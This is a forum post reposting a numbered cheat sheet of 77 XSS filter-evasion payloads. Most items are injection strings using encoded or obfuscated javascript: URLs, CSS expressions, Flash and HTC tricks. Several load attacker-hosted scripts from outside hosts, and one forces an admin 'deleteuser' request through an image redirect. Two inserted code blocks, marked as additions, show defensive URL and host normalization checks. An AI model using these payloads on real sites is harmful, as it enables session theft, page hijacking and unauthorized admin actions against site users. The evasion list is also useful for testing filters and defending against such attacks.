It seems t00ls has rather little material on XSS, so when I saw something good I copied it over; not sure whether any of you need to bookmark it.

(1) Plain XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
(2) IMG tag XSS using a JavaScript command
<IMG SRC="javascript:alert('XSS');">
(3) IMG tag, no semicolon, no quotes
<IMG SRC=javascript:alert('XSS')>
(4) IMG tag, case-insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>
(5) HTML encoding (semicolons required)
<IMG SRC=javascript:alert("XSS")>
(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
(7) fromCharCode (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..omitted..S')>
(9) 7-bit UTF-8 Unicode encoding, no semicolons (calculator)
<IMG SRC=jav..omitted..S')>
(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=java..omitted..XSS')>
(11) Embedded tab to split up the JavaScript
<IMG SRC="jav ascript:alert('XSS');">
(12) Embedded encoded tab to split up the JavaScript
<IMG SRC="jav ascript:alert('XSS');">
(13) Embedded newline
<IMG SRC="jav ascript:alert('XSS');">
(14) Embedded carriage return
<IMG SRC="jav ascript:alert('XSS');">
(15) Multi-line injected JavaScript via embedded characters; an extreme XSS example
<IMG SRC="javascript:alert('XSS')">
(16) Getting around a character limit (requires the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>
12-7-1 T00LS - Powered by Discuz! Board
https://www.t00ls.net/viewthread ... table&tid=15267 2/6
(17) Null byte
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out
(18) Null byte 2; null bytes are basically useless domestically, because there is nowhere to exploit them
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out
(19) Spaces and meta characters before the JavaScript in an IMG tag
<IMG SRC=" javascript:alert('XSS');">
(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>
(21) Non-alpha-non-digit XSS 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
(22) Non-alpha-non-digit XSS 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>
(23) Extraneous open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>
(24) No closing script tag (Firefox and similar browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>
(26) Half-open HTML/JavaScript XSS
<IMG SRC="javascript:alert('XSS')"
(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <
(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>
(29) Escaping JavaScript escapes
\";alert('XSS');//
(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
(31) Input Image
<INPUT SRC="javascript:alert('XSS');">
(32) BODY Image
<BODY BACKGROUND="javascript:alert('XSS')">
(33) BODY tag
<BODY('XSS')>
(34) IMG Dynsrc
<IMG DYNSRC="javascript:alert('XSS')">
(35) IMG Lowsrc
<IMG LOWSRC="javascript:alert('XSS')">
(36) BGSOUND
<BGSOUND SRC="javascript:alert('XSS');">
(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
(38) Remote style sheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">
(39) List-style-image
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS
(40) IMG VBscript
<IMG SRC='vbscript:msgbox("XSS")'></STYLE><UL><LI>XSS
(41) META with a link URL
<META HTTP-EQUIV="refresh" CONTENT="0;URL=http://;URL=javascript:alert('XSS');">
(42) Iframe
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
(43) Frame
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
(44) Table
<TABLE BACKGROUND="javascript:alert('XSS')">
(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">
(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
(47) DIV background-image with extra characters appended (1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
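The vectors in items 3 to 19 and 47 all work because a filter reads the attribute value literally while the browser first strips control characters, decodes entities and ignores case. The following is an added example in JavaScript (not part of the original post or the cheat sheet it copies) of a defender-side check that performs that same normalization before deciding whether a URL may be emitted; the allowlist policy and the function names are this example's own assumptions.

```javascript
// Added example (not from the original post): normalize a URL attribute
// value the way browsers do before reading its scheme, so the obfuscations
// above (mixed case, embedded TAB/LF/CR, HTML entities with or without a
// semicolon, hex entities, NUL and other control bytes, leading spaces,
// appended Unicode spaces) cannot hide a "javascript:" or "vbscript:" URL.
// The allowlist policy and the function names are this example's own.

const ALLOWED_SCHEMES = new Set(["http", "https", "mailto"]);

// Decode numeric character references. Browsers accept a missing trailing
// semicolon, which is why filters that require one are bypassed.
function decodeNumericEntities(s) {
  return s.replace(/&#(x[0-9a-f]+|[0-9]+);?/gi, (_, num) => {
    const hex = num[0].toLowerCase() === "x";
    const cp = hex ? parseInt(num.slice(1), 16) : parseInt(num, 10);
    return Number.isFinite(cp) && cp <= 0x10ffff ? String.fromCodePoint(cp) : "";
  });
}

// Remove characters browsers ignore in and around a URL scheme: C0 controls
// (TAB, LF, CR and NUL included), space, NBSP and Unicode spaces of the kind
// item 47 lists (U+2000..U+200B, U+3000, U+FEFF; assumed range).
function stripIgnoredChars(s) {
  return s.replace(/[\u0000-\u0020\u00a0\u2000-\u200b\u3000\ufeff]/g, "");
}

// Return the scheme a browser would act on, or "" for a relative URL.
function effectiveScheme(rawValue) {
  const normalized = stripIgnoredChars(decodeNumericEntities(rawValue)).toLowerCase();
  const m = /^([a-z][a-z0-9+.-]*):/.exec(normalized);
  return m ? m[1] : "";
}

// True when the value may be emitted in href/src: relative, or an allowed scheme.
function isSafeUrl(rawValue) {
  const scheme = effectiveScheme(rawValue);
  return scheme === "" || ALLOWED_SCHEMES.has(scheme);
}
```

Run the check on the raw attribute value at output time, not on the already-decoded text, and reject rather than "clean" anything whose effective scheme is not on the allowlist.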
(48) DIV expression
<DIV STYLE="width: expression(alert('XSS'));">
(49) STYLE attribute with a split-up expression
<IMG STYLE="xss:expression(alert('XSS'))">
(50) Anonymous tag with STYLE (made of an open angle bracket followed by a letter)
<XSS STYLE="xss:expression(alert('XSS'))">
(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
(52) IMG STYLE method
exppression(alert("XSS"))'>
(53) STYLE background
<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
(54) BASE
<BASE HREF="javascript:alert('XSS');//">
(55) EMBED tag; you can embed a Flash file that contains the XSS
<EMBED SRC="http://3w.org/XSS/xss.swf" ></EMBED>
(56) Using ActionScript inside Flash, you can smuggle in your XSS code
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval(a+b+c+d);
(57) XML namespace; the HTC file must be on the same server as your XSS vector
<HTML xmlns:xss>
<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>
(58) If your JS is filtered, you can put the JS code inside an image and use that
<SCRIPT SRC=""></SCRIPT>
(59) IMG embedded command; can execute arbitrary commands
<IMG SRC="http://www.XXX.com/a.php?a=b">
(60) IMG embedded command (a.jpg on the same server)
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
(61) Bypassing symbol filters
<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>
(62)
<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>
(63)
<SCRIPT a=">" " SRC="http://3w.org/xss.js"></SCRIPT>
(64)
<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>
(65)
<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>
(66)
<SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>
(67)
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>
(68) URL evasion
<A HREF="http://127.0.0.1/">XSS</A>
(69) URL encoding
<A HREF="http://3w.org">XSS</A>
(70) IP in decimal
<A HREF="http://3232235521">XSS</A>
(71) IP in hexadecimal
<A HREF="http://0xc0.0xa8.0x00.0x01">XSS</A>
(72) IP in octal
<A HREF="http://0300.0250.0000.0001">XSS</A>
(73) Mixed encoding
<A HREF="h
tt p://6 6.000146.0x7.147/">XSS</A>
(74) Omitting "http:"
<A HREF="//www.google.com/">XSS</A>
(75) Omitting "www"
<A HREF="http://google.com/">XSS</A>
(76) Absolute DNS with a trailing dot
<A HREF="http://www.google.com./">XSS</A>
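Items 68 to 76 defeat link filters that compare the host string as written. The following is an added example in JavaScript (not part of the original post) of the canonicalization a link filter or allowlist should apply first: it strips the TAB/LF/CR browsers ignore, expands the decimal, hex, octal and mixed IPv4 spellings into one dotted-quad form, drops the trailing dot and handles protocol-relative links; the function names are this example's own assumptions.

```javascript
// Added example (not from the original post): canonicalize the host of a
// link before comparing it against an allow/deny list, so the decimal, hex,
// octal and mixed IP spellings above, embedded TAB/LF/CR, a trailing
// "absolute DNS" dot and protocol-relative "//host" links all reduce to one
// normalized host string. Function names are this example's own.

// Parse one dotted part the way browsers do: 0x.. hex, leading-0 octal, else decimal.
function parseIpPart(part) {
  if (/^0x[0-9a-f]*$/i.test(part)) return part.length === 2 ? 0 : parseInt(part.slice(2), 16);
  if (/^0[0-7]+$/.test(part)) return parseInt(part, 8);
  if (/^[0-9]+$/.test(part)) return parseInt(part, 10);
  return NaN;
}

// Expand an IPv4 host written with 1 to 4 parts into dotted-quad form, or
// return null when the host is not a numeric IPv4 spelling at all.
function normalizeIpv4(host) {
  const parts = host.split(".");
  if (parts.length > 4) return null;
  const nums = parts.map(parseIpPart);
  if (nums.some(Number.isNaN)) return null;
  const last = nums.pop();            // the last part fills the remaining bytes
  if (nums.some((n) => n > 255)) return null;
  const remaining = 4 - nums.length;
  if (last >= 256 ** remaining) return null;
  let value = 0;
  for (const n of nums) value = value * 256 + n;
  value = value * 256 ** remaining + last;
  return [24, 16, 8, 0].map((shift) => Math.floor(value / 2 ** shift) % 256).join(".");
}

// Extract and canonicalize the host of an href: strip TAB/LF/CR as browsers
// do, drop userinfo and port, lowercase, remove trailing dots, expand numeric
// IPv4 forms. Returns null for non-network URLs (javascript:, relative paths).
function canonicalHost(href) {
  const cleaned = href.replace(/[\t\n\r]/g, "").trim();
  const m = /^(?:[a-z][a-z0-9+.-]*:)?\/\/([^/?#]*)/i.exec(cleaned);
  if (!m) return null;
  const host = m[1].replace(/^[^@]*@/, "").replace(/:[0-9]*$/, "").toLowerCase().replace(/\.+$/, "");
  return normalizeIpv4(host) ?? host;
}
```

Compare the value returned by canonicalHost, never the raw href text, and treat a null result (a non-network scheme such as javascript:) as a rejection rather than a pass.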
(77) JavaScript link
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>

Original source: http://fuzzexp.org/u/0day/?p=14